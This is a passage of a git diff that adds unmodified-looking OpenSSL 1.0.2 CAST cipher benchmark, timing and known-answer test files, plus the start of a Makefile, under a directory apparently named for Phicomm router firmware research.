+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/cast.h>
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  define HZ      100.0
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static unsigned char key[] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
+    };
+    CAST_KEY sch;
+    double a, b, c, d;
+#ifndef SIGALRM
+    long ca, cb, cc;
+#endif
+
+#ifndef TIMES
+    printf("To get the most accurate results, try to run this\n");
+    printf("program when this computer is idle.\n");
+#endif
+
+#ifndef SIGALRM
+    printf("First we calculate the approximate speed ...\n");
+    CAST_set_key(&sch, 16, key);
+    count = 10;
+    do {
+        long i;
+        CAST_LONG data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            CAST_encrypt(data, &sch);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count / 512;
+    cb = count;
+    cc = count * 8 / BUFSIZE + 1;
+    printf("Doing CAST_set_key %ld times\n", ca);
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    printf("Doing CAST_set_key for 10 seconds\n");
+    alarm(10);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(ca); count += 4) {
+        CAST_set_key(&sch, 16, key);
+        CAST_set_key(&sch, 16, key);
+        CAST_set_key(&sch, 16, key);
+        CAST_set_key(&sch, 16, key);
+    }
+    d = Time_F(STOP);
+    printf("%ld cast set_key's in %.2f seconds\n", count, d);
+    a = ((double)COUNT(ca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing CAST_encrypt's for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing CAST_encrypt %ld times\n", cb);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cb); count += 4) {
+        CAST_LONG data[2];
+
+        CAST_encrypt(data, &sch);
+        CAST_encrypt(data, &sch);
+        CAST_encrypt(data, &sch);
+        CAST_encrypt(data, &sch);
+    }
+    d = Time_F(STOP);
+    printf("%ld CAST_encrypt's in %.2f second\n", count, d);
+    b = ((double)COUNT(cb) * 8) / d;
+
+#ifdef SIGALRM
+    printf("Doing CAST_cbc_encrypt on %ld byte blocks for 10 seconds\n",
+           BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing CAST_cbc_encrypt %ld times on %ld byte blocks\n", cc,
+           BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cc); count++)
+        CAST_cbc_encrypt(buf, buf, BUFSIZE, &sch, &(key[0]), CAST_ENCRYPT);
+    d = Time_F(STOP);
+    printf("%ld CAST_cbc_encrypt's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    c = ((double)COUNT(cc) * BUFSIZE) / d;
+
+    printf("CAST set_key       per sec = %12.2f (%9.3fuS)\n", a, 1.0e6 / a);
+    printf("CAST raw ecb bytes per sec = %12.2f (%9.3fuS)\n", b, 8.0e6 / b);
+    printf("CAST cbc     bytes per sec = %12.2f (%9.3fuS)\n", c, 8.0e6 / c);
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/castopts.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/castopts.c
new file mode 100644
index 0000000..42687f2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/castopts.c
@@ -0,0 +1,334 @@
+/* crypto/cast/castopts.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * define PART1, PART2, PART3 or PART4 to build only with a few of the
+ * options. This is for machines with 64k code segment size restrictions.
+ */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC))
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/cast.h>
+#define CAST_DEFAULT_OPTIONS
+#undef E_CAST
+#define CAST_encrypt  CAST_encrypt_normal
+#define CAST_decrypt  CAST_decrypt_normal
+#define CAST_cbc_encrypt  CAST_cbc_encrypt_normal
+#undef HEADER_CAST_LOCL_H
+#include "c_enc.c"
+#define CAST_PTR
+#undef CAST_PTR2
+#undef E_CAST
+#undef CAST_encrypt
+#undef CAST_decrypt
+#undef CAST_cbc_encrypt
+#define CAST_encrypt  CAST_encrypt_ptr
+#define CAST_decrypt  CAST_decrypt_ptr
+#define CAST_cbc_encrypt  CAST_cbc_encrypt_ptr
+#undef HEADER_CAST_LOCL_H
+#include "c_enc.c"
+#undef CAST_PTR
+#define CAST_PTR2
+#undef E_CAST
+#undef CAST_encrypt
+#undef CAST_decrypt
+#undef CAST_cbc_encrypt
+#define CAST_encrypt  CAST_encrypt_ptr2
+#define CAST_decrypt  CAST_decrypt_ptr2
+#define CAST_cbc_encrypt  CAST_cbc_encrypt_ptr2
+#undef HEADER_CAST_LOCL_H
+#include "c_enc.c"
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  ifndef _BSD_CLK_TCK_         /* FreeBSD fix */
+#   define HZ   100.0
+#  else                         /* _BSD_CLK_TCK_ */
+#   define HZ ((double)_BSD_CLK_TCK_)
+#  endif
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1000.0;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+#ifdef SIGALRM
+# define print_name(name) fprintf(stderr,"Doing %s's for 10 seconds\n",name); alarm(10);
+#else
+# define print_name(name) fprintf(stderr,"Doing %s %ld times\n",name,cb);
+#endif
+
+#define time_it(func,name,index) \
+        print_name(name); \
+        Time_F(START); \
+        for (count=0,run=1; COND(cb); count+=4) \
+                { \
+                unsigned long d[2]; \
+                func(d,&sch); \
+                func(d,&sch); \
+                func(d,&sch); \
+                func(d,&sch); \
+                } \
+        tm[index]=Time_F(STOP); \
+        fprintf(stderr,"%ld %s's in %.2f second\n",count,name,tm[index]); \
+        tm[index]=((double)COUNT(cb))/tm[index];
+
+#define print_it(name,index) \
+        fprintf(stderr,"%s bytes per sec = %12.2f (%5.1fuS)\n",name, \
+                tm[index]*8,1.0e6/tm[index]);
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static char key[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0
+    };
+    CAST_KEY sch;
+    double d, tm[16], max = 0;
+    int rank[16];
+    char *str[16];
+    int max_idx = 0, i, num = 0, j;
+#ifndef SIGALARM
+    long ca, cb, cc, cd, ce;
+#endif
+
+    for (i = 0; i < 12; i++) {
+        tm[i] = 0.0;
+        rank[i] = 0;
+    }
+
+#ifndef TIMES
+    fprintf(stderr, "To get the most accurate results, try to run this\n");
+    fprintf(stderr, "program when this computer is idle.\n");
+#endif
+
+    CAST_set_key(&sch, 16, key);
+
+#ifndef SIGALRM
+    fprintf(stderr, "First we calculate the approximate speed ...\n");
+    count = 10;
+    do {
+        long i;
+        unsigned long data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            CAST_encrypt(data, &sch);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count;
+    cb = count * 3;
+    cc = count * 3 * 8 / BUFSIZE + 1;
+    cd = count * 8 / BUFSIZE + 1;
+
+    ce = count / 20 + 1;
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    alarm(10);
+#endif
+
+    time_it(CAST_encrypt_normal, "CAST_encrypt_normal ", 0);
+    time_it(CAST_encrypt_ptr, "CAST_encrypt_ptr    ", 1);
+    time_it(CAST_encrypt_ptr2, "CAST_encrypt_ptr2   ", 2);
+    num += 3;
+
+    str[0] = "<nothing>";
+    print_it("CAST_encrypt_normal ", 0);
+    max = tm[0];
+    max_idx = 0;
+    str[1] = "ptr      ";
+    print_it("CAST_encrypt_ptr ", 1);
+    if (max < tm[1]) {
+        max = tm[1];
+        max_idx = 1;
+    }
+    str[2] = "ptr2     ";
+    print_it("CAST_encrypt_ptr2 ", 2);
+    if (max < tm[2]) {
+        max = tm[2];
+        max_idx = 2;
+    }
+
+    printf("options    CAST ecb/s\n");
+    printf("%s %12.2f 100.0%%\n", str[max_idx], tm[max_idx]);
+    d = tm[max_idx];
+    tm[max_idx] = -2.0;
+    max = -1.0;
+    for (;;) {
+        for (i = 0; i < 3; i++) {
+            if (max < tm[i]) {
+                max = tm[i];
+                j = i;
+            }
+        }
+        if (max < 0.0)
+            break;
+        printf("%s %12.2f  %4.1f%%\n", str[j], tm[j], tm[j] / d * 100.0);
+        tm[j] = -2.0;
+        max = -1.0;
+    }
+
+    switch (max_idx) {
+    case 0:
+        printf("-DCAST_DEFAULT_OPTIONS\n");
+        break;
+    case 1:
+        printf("-DCAST_PTR\n");
+        break;
+    case 2:
+        printf("-DCAST_PTR2\n");
+        break;
+    }
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casts.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casts.cpp
new file mode 100644
index 0000000..8d7bd46
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casts.cpp
@@ -0,0 +1,70 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/cast.h>
+
+void main(int argc,char *argv[])
+	{
+	CAST_KEY key;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+	static unsigned char d[16]={0x01,0x23,0x45,0x67,0x89,0xAB,0xCD,0xEF};
+
+	CAST_set_key(&key, 16,d);
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			CAST_encrypt(&data[0],&key);
+			GetTSC(s1);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			GetTSC(e1);
+			GetTSC(s2);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			GetTSC(e2);
+			CAST_encrypt(&data[0],&key);
+			}
+
+		printf("cast %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casttest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casttest.c
new file mode 100644
index 0000000..dc31bc6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casttest.c
@@ -0,0 +1,241 @@
+/* crypto/cast/casttest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <openssl/opensslconf.h> /* To see if OPENSSL_NO_CAST is defined */
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_CAST
+int main(int argc, char *argv[])
+{
+    printf("No CAST support\n");
+    return (0);
+}
+#else
+# include <openssl/cast.h>
+
+# define FULL_TEST
+
+static unsigned char k[16] = {
+    0x01, 0x23, 0x45, 0x67, 0x12, 0x34, 0x56, 0x78,
+    0x23, 0x45, 0x67, 0x89, 0x34, 0x56, 0x78, 0x9A
+};
+
+static unsigned char in[8] =
+    { 0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF };
+
+static int k_len[3] = { 16, 10, 5 };
+
+static unsigned char c[3][8] = {
+    {0x23, 0x8B, 0x4F, 0xE5, 0x84, 0x7E, 0x44, 0xB2},
+    {0xEB, 0x6A, 0x71, 0x1A, 0x2C, 0x02, 0x27, 0x1B},
+    {0x7A, 0xC8, 0x16, 0xD1, 0x6E, 0x9B, 0x30, 0x2E},
+};
+
+static unsigned char out[80];
+
+static unsigned char in_a[16] = {
+    0x01, 0x23, 0x45, 0x67, 0x12, 0x34, 0x56, 0x78,
+    0x23, 0x45, 0x67, 0x89, 0x34, 0x56, 0x78, 0x9A
+};
+
+static unsigned char in_b[16] = {
+    0x01, 0x23, 0x45, 0x67, 0x12, 0x34, 0x56, 0x78,
+    0x23, 0x45, 0x67, 0x89, 0x34, 0x56, 0x78, 0x9A
+};
+
+static unsigned char c_a[16] = {
+    0xEE, 0xA9, 0xD0, 0xA2, 0x49, 0xFD, 0x3B, 0xA6,
+    0xB3, 0x43, 0x6F, 0xB8, 0x9D, 0x6D, 0xCA, 0x92
+};
+
+static unsigned char c_b[16] = {
+    0xB2, 0xC9, 0x5E, 0xB0, 0x0C, 0x31, 0xAD, 0x71,
+    0x80, 0xAC, 0x05, 0xB8, 0xE8, 0x3D, 0x69, 0x6E
+};
+
+# if 0
+char *text = "Hello to all people out there";
+
+static unsigned char cfb_key[16] = {
+    0xe1, 0xf0, 0xc3, 0xd2, 0xa5, 0xb4, 0x87, 0x96,
+    0x69, 0x78, 0x4b, 0x5a, 0x2d, 0x3c, 0x0f, 0x1e,
+};
+static unsigned char cfb_iv[80] =
+    { 0x34, 0x12, 0x78, 0x56, 0xab, 0x90, 0xef, 0xcd };
+static unsigned char cfb_buf1[40], cfb_buf2[40], cfb_tmp[8];
+#  define CFB_TEST_SIZE 24
+static unsigned char plain[CFB_TEST_SIZE] = {
+    0x4e, 0x6f, 0x77, 0x20, 0x69, 0x73,
+    0x20, 0x74, 0x68, 0x65, 0x20, 0x74,
+    0x69, 0x6d, 0x65, 0x20, 0x66, 0x6f,
+    0x72, 0x20, 0x61, 0x6c, 0x6c, 0x20
+};
+
+static unsigned char cfb_cipher64[CFB_TEST_SIZE] = {
+    0x59, 0xD8, 0xE2, 0x65, 0x00, 0x58, 0x6C, 0x3F,
+    0x2C, 0x17, 0x25, 0xD0, 0x1A, 0x38, 0xB7, 0x2A,
+    0x39, 0x61, 0x37, 0xDC, 0x79, 0xFB, 0x9F, 0x45
+/*- 0xF9,0x78,0x32,0xB5,0x42,0x1A,0x6B,0x38,
+    0x9A,0x44,0xD6,0x04,0x19,0x43,0xC4,0xD9,
+    0x3D,0x1E,0xAE,0x47,0xFC,0xCF,0x29,0x0B,*/
+};
+# endif
+
+int main(int argc, char *argv[])
+{
+# ifdef FULL_TEST
+    long l;
+    CAST_KEY key_b;
+# endif
+    int i, z, err = 0;
+    CAST_KEY key;
+
+    for (z = 0; z < 3; z++) {
+        CAST_set_key(&key, k_len[z], k);
+
+        CAST_ecb_encrypt(in, out, &key, CAST_ENCRYPT);
+        if (memcmp(out, &(c[z][0]), 8) != 0) {
+            printf("ecb cast error encrypting for keysize %d\n",
+                   k_len[z] * 8);
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", out[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", c[z][i]);
+            err = 20;
+            printf("\n");
+        }
+
+        CAST_ecb_encrypt(out, out, &key, CAST_DECRYPT);
+        if (memcmp(out, in, 8) != 0) {
+            printf("ecb cast error decrypting for keysize %d\n",
+                   k_len[z] * 8);
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", out[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", in[i]);
+            printf("\n");
+            err = 3;
+        }
+    }
+    if (err == 0)
+        printf("ecb cast5 ok\n");
+
+# ifdef FULL_TEST
+    {
+        unsigned char out_a[16], out_b[16];
+        static char *hex = "0123456789ABCDEF";
+
+        printf("This test will take some time....");
+        fflush(stdout);
+        memcpy(out_a, in_a, sizeof(in_a));
+        memcpy(out_b, in_b, sizeof(in_b));
+        i = 1;
+
+        for (l = 0; l < 1000000L; l++) {
+            CAST_set_key(&key_b, 16, out_b);
+            CAST_ecb_encrypt(&(out_a[0]), &(out_a[0]), &key_b, CAST_ENCRYPT);
+            CAST_ecb_encrypt(&(out_a[8]), &(out_a[8]), &key_b, CAST_ENCRYPT);
+            CAST_set_key(&key, 16, out_a);
+            CAST_ecb_encrypt(&(out_b[0]), &(out_b[0]), &key, CAST_ENCRYPT);
+            CAST_ecb_encrypt(&(out_b[8]), &(out_b[8]), &key, CAST_ENCRYPT);
+            if ((l & 0xffff) == 0xffff) {
+                printf("%c", hex[i & 0x0f]);
+                fflush(stdout);
+                i++;
+            }
+        }
+
+        if ((memcmp(out_a, c_a, sizeof(c_a)) != 0) ||
+            (memcmp(out_b, c_b, sizeof(c_b)) != 0)) {
+            printf("\n");
+            printf("Error\n");
+
+            printf("A out =");
+            for (i = 0; i < 16; i++)
+                printf("%02X ", out_a[i]);
+            printf("\nactual=");
+            for (i = 0; i < 16; i++)
+                printf("%02X ", c_a[i]);
+            printf("\n");
+
+            printf("B out =");
+            for (i = 0; i < 16; i++)
+                printf("%02X ", out_b[i]);
+            printf("\nactual=");
+            for (i = 0; i < 16; i++)
+                printf("%02X ", c_b[i]);
+            printf("\n");
+        } else
+            printf(" ok\n");
+    }
+# endif
+
+    EXIT(err);
+    return (err);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile
new file mode 100644
index 0000000..7f15840
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile
@@ -0,0 +1,109 @@
+#
+# OpenSSL/crypto/cmac/Makefile
+#
+
+DIR=	cmac
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=cmac.c cm_ameth.c cm_pmeth.c
